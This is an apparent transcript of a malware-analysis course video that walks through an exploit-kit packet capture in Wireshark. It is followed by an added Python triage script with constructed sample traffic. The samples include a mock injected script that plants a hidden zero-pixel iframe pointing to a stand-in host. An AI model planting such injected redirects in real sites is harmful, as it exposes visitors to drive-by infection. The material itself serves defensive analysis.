[00:00:10] Welcome back everyone to one more video of this malware reverse engineering course. In this video we are going to do a demo of how we can analyze a suspicious or malicious pcap that contains exploit kit traffic. So in the previous videos we talked about Wireshark, we talked about packet captures, we talked about filters and how we can narrow down our search results, and we also talked about exploit kits as a delivery mechanism. In this video we are going to combine all these aspects: we are going to look at the pcap in Wireshark and we'll be applying a bunch of filters to basically analyze and extrapolate the malware traffic. So one of the good resources for downloading pcaps can be this website called malware-traffic-analysis.net. This website is an excellent resource for pcaps that are explicitly related to exploit kits, malware and spam. So this website contains a collection of around fifteen hundred pcap samples. You can download them and you can start analyzing those pcaps to understand how malware traffic is captured and how exploit kits can be analyzed. It contains a lot of different scenarios about exploit kits, spam and so on, so all those pcaps can be really, really helpful for you to analyze and get more hands-on experience with analyzing malicious packet captures.
[00:01:43] So I just wanted to bring up that all these download activities and analysis activities should be carried out in a virtual environment. So as you can see, currently I'm in my Windows environment and I have downloaded one of the pcaps from the site, and here is the pcap loaded in Wireshark, so we can begin by looking at all the HTTP requests and responses. So here is my filter. If I press Enter, it shows that there is a GET request followed by another GET request that has a pretty long and weird URI pattern, something similar to what we saw in our previous videos. So this URI pattern, it doesn't mean that it's actually bad, but it does point to some suspicious activity, because a lot of times exploit kits have these kinds of weird URI patterns. So this was followed by a response which came out to be text/html, so most probably this might be the landing page. There is another request that is followed by a text/html here, so probably this is another response that came back from the exploit kit. It again can either be a landing page or probably some subset of response that was delivered back to us. Then there is another GET request which is followed by a response that has a MIME type of Shockwave Flash.
[00:03:10] So it seems like after the exploit kit was able to enumerate our machine, it figured out that the browser contains a vulnerable version of Flash. That's why it downloaded a Flash exploit onto the machine, and there is another GET request. This seems to be related to the payload download, because immediately after this request we are seeing some POST activity as well. So why the POST activity is interesting here is because once the malware or the final payload is dropped onto the system, the malware will start performing its command and control by sending signals to it, and that's where it tries to push some data to its command and control. So that's why these POST requests can be really interesting to look at. So let us start by examining the first GET request, so we can go to Follow, then TCP Stream. So if you see here, it seems like the individual visited this website and this was the response, and if you look at the code closely it seems like pretty normal HTML code. So you have to figure out the location from where the infection might have started. So if you scroll all the way down, you'll see that there is a chunk of code that is present at the very end. This JavaScript seems to be creating an iframe. As you can see, it's defining a variable.
[00:04:48] The variable is for the iframe, and then it is creating an element with the same variable name. So it's basically trying to construct an iframe that is zero pixels high with a zero-pixel border, and the iframe is pointing to this particular HTTP request. And this seems to be exactly like the request which we just saw in our pcap, so probably this is where the infection actually is beginning from. Now, one thing which I want to bring up here is that because this JavaScript is present all the way at the end of the HTML code of this website, it's highly likely that this website might be compromised by the attackers and they have injected this code into this website. A lot of times popular content management systems like WordPress or Drupal, etc., have a bunch of vulnerabilities, or probably one of their plugins will have some vulnerability that attackers might use to compromise your website. And once they compromise it, they can inject these kinds of scripts into it so that any traffic that comes to your website will basically get infected by the exploit kit. So let us go back to our request and response view here. So that was the first one. The second GET request, let's right-click on it and go to Follow the stream.
[00:06:21] If you follow the TCP stream, it shows that this was the GET request, and it's the same one which we saw in the JavaScript in the main website in the previous request. So here also we got a response, and it seems like this web page is also containing an iframe and JavaScript which is pointing to another malicious URL. If you scroll down further, you'll see that there are certain scripts which are basically trying to enumerate the browser or trying to look at the User-Agent. So all these scripts are pretty legitimate, and attackers use these scripts to figure out your browser, or figure out the version of your browser, or figure out the plugins that are there in your browser. If you continue scrolling down, you will see that there is a POST request and the response is very obfuscated script. So this seems like the main page of the exploit kit. As you can see, this is heavily obfuscated and literally nothing can be read in plain text here. So this is why exploit kits are really, really hard to track or really, really difficult to understand, because of their heavy obfuscation and multiple levels of steps involved. It's not easy to track them when you have a very long pcap file. So going back to our request/response view, so we looked at this request. Now let's check this one, and it seems like its response is a Flash file, so let's go to Follow.
[00:08:07] TCP Stream, and as we guessed, this is a Shockwave Flash file, and the magic bytes are CWS, which means it's a compressed Flash file. So what do we do here? Let's say if you want to analyze this Flash file, what we can do here is we can go to File, then Export Objects, and select HTTP. Once we select that, we can select the request that shows that it's application/x-shockwave-flash. You can click on Save, and let's say on our desktop we can create a folder and save the Flash file there. Similarly, let's say you want to save the HTML pages that we just analyzed. You can just select them and you can click on Save, just like we just did with the Flash file. So if you want to analyze the landing pages or the browser enumeration scripts, you can similarly save them here and you can play with them and deobfuscate them. So let's close these and go back to our request/response view. So we know that this was a Flash exploit. Now there is another GET request, and it seems like there was no response associated with this. We can just close it off. So this is how we can analyze the pcap to figure out whether it contains any traces of exploit kit activity or not.
[00:09:52] So this was a quick demo about how we can analyze exploit kits, and in the next video we will begin analyzing the suspicious Flash file and the malware that gets downloaded from the exploit kit. Thanks for watching.
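The triage the video does by hand in Wireshark (spotting the long URI, following the stream to the hidden iframe, matching its src to the next GET, recognising the CWS magic bytes, and treating the POSTs after the drop as command-and-control traffic) can be scripted once the HTTP transactions are exported. The block below is an added example by the editor, not the instructor's code and not material from malware-traffic-analysis.net; the hostnames under .example.test, the URIs and the response bodies are constructed sample data that mimic the chain described in the video. With real traffic you would build the transaction list from the request/response pairs exported from Wireshark (File > Export Objects > HTTP, or tshark) instead of the SAMPLE list.

```python
"""Exploit-kit infection-chain triage over HTTP transactions pulled from a pcap.

The SAMPLE transactions are constructed (NOT the video's pcap) and mimic the
chain the video walks through: compromised page -> hidden iframe -> gate ->
landing page -> Flash exploit -> payload download -> POST check-ins.
Hostnames under .example.test, URIs and bodies are all made up for the demo.
"""
import re
from dataclasses import dataclass

# SWF magic bytes: FWS = uncompressed, CWS = zlib-compressed, ZWS = LZMA-compressed
SWF_MAGIC = {b"FWS": "uncompressed SWF", b"CWS": "zlib-compressed SWF", b"ZWS": "LZMA-compressed SWF"}

URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""")
# width/height/frameBorder set to 0, either as an HTML attribute or in JS (el.width = 0)
ZERO_DIM_RE = re.compile(r"""\b(?:width|height|frameborder)\s*=\s*["']?0\b""", re.I)


@dataclass
class Txn:
    """One HTTP request plus its response, as Wireshark's Follow TCP Stream shows it."""
    method: str
    host: str
    uri: str
    content_type: str = ""  # response Content-Type; "" when no response was seen
    body: bytes = b""       # response body; the first bytes suffice for magic checks

    @property
    def url(self) -> str:
        return f"http://{self.host}{self.uri}"


def suspicious_uri(uri: str) -> bool:
    """Long URIs or long random-looking path tokens: a weak indicator, not proof."""
    path = uri.split("?", 1)[0]
    tokens = [s for s in path.split("/") if s]
    random_tokens = [s for s in tokens if len(s) >= 20 and re.fullmatch(r"[A-Za-z0-9_-]+", s)]
    return len(uri) >= 80 or bool(random_tokens)


def classify(t: Txn) -> str:
    """Label a transaction by method, magic bytes and Content-Type, in that order of trust."""
    if t.method == "POST":
        return "POST (possible C2 check-in / exfil)"
    if not t.content_type and not t.body:
        return "no response"
    if t.body[:3] in SWF_MAGIC:
        return f"Flash object ({SWF_MAGIC[t.body[:3]]})"
    if "shockwave-flash" in t.content_type:
        return "Flash object (by Content-Type only, magic bytes missing)"
    if t.content_type.startswith("text/html"):
        return "HTML"
    if t.body[:2] == b"MZ" or t.content_type.startswith("application/octet-stream"):
        return "binary download (possible payload)"
    return t.content_type or "unknown"


def referenced_urls(t: Txn) -> set:
    """Absolute URLs quoted in an HTML response (iframe src attributes, JS string literals)."""
    if not t.content_type.startswith("text/html"):
        return set()
    return set(URL_RE.findall(t.body.decode("latin-1")))


def hidden_iframe(t: Txn) -> bool:
    """True if an HTML response mentions an iframe and zeroes a dimension or the border."""
    if not t.content_type.startswith("text/html"):
        return False
    html = t.body.decode("latin-1")
    return "iframe" in html.lower() and ZERO_DIM_RE.search(html) is not None


def build_chain(txns):
    """Annotate each transaction and link it to earlier HTML responses that referenced its URL."""
    rows = []
    for i, t in enumerate(txns):
        rows.append({
            "idx": i, "method": t.method, "url": t.url, "kind": classify(t),
            "suspicious_uri": suspicious_uri(t.uri), "hidden_iframe": hidden_iframe(t),
            "referenced_by": [j for j in range(i) if t.url in referenced_urls(txns[j])],
        })
    return rows


def post_infection_posts(rows):
    """Indices of POSTs that follow the first binary download: command-and-control candidates."""
    drops = [r["idx"] for r in rows if r["kind"].startswith("binary download")]
    return [r["idx"] for r in rows if r["method"] == "POST" and drops and r["idx"] > drops[0]]


# --- constructed sample data (hypothetical hosts and URIs) -------------------
GATE_URI = "/3e8f2a1b0c7d9e4f6a5b1c2d3e4f5a6b/index.php?q=7b0d"
EK_URI = "/e9c4f1a7b3d2c8e6f0a1b2c3d4e5f6a7/a1b2c3d4e5f6a7b8c9d0/main.php"
COMPROMISED_HTML = (b"<html><body><p>Ordinary page content.</p>\n<script>var q=document.createElement('iframe');"
                    b"q.src='http://gate.example.test" + GATE_URI.encode() + b"';q.width=0;q.height=0;"
                    b"q.frameBorder=0;document.body.appendChild(q);</script></body></html>")
GATE_HTML = (b'<html><iframe src="http://ek.example.test' + EK_URI.encode() + b'" width="0" height="0"></iframe>'
             b"<script>var ua=navigator.userAgent,p=navigator.plugins;</script></html>")
EK_HTML = b"<html><script>eval(String.fromCharCode(118,97,114,32,120))</script></html>"

SAMPLE = [
    Txn("GET", "www.example.test", "/", "text/html", COMPROMISED_HTML),
    Txn("GET", "gate.example.test", GATE_URI, "text/html", GATE_HTML),
    Txn("GET", "ek.example.test", EK_URI, "text/html", EK_HTML),
    Txn("GET", "ek.example.test", "/a1b2c3d4e5f6a7b8c9d0/flash.php", "application/x-shockwave-flash", b"CWS\x0f" + b"\0" * 16),
    Txn("GET", "ek.example.test", "/a1b2c3d4e5f6a7b8c9d0/load.php?id=1", "application/octet-stream", b"MZ\x90\0" + b"\0" * 16),
    Txn("POST", "c2.example.test", "/gate.php"),
    Txn("GET", "ek.example.test", "/a1b2c3d4e5f6a7b8c9d0/done.php"),  # no response captured
]

if __name__ == "__main__":
    rows = build_chain(SAMPLE)
    for r in rows:
        flags = [f for f in ("suspicious_uri", "hidden_iframe") if r[f]]
        print(f'{r["idx"]} {r["method"]:4} {r["kind"]:42} <- {r["referenced_by"]} {r["url"]} {flags}')
    print("C2 candidates:", post_infection_posts(rows))
```

The chain is reconstructed from content rather than timing: a transaction is linked to an earlier one only when its full URL appears as a quoted literal in that earlier HTML response, which is exactly the iframe-src-to-next-GET match done by eye in the video. Magic bytes are trusted over the Content-Type header because a kit controls both the header and the body, and the URI heuristic is deliberately reported as a flag rather than a verdict.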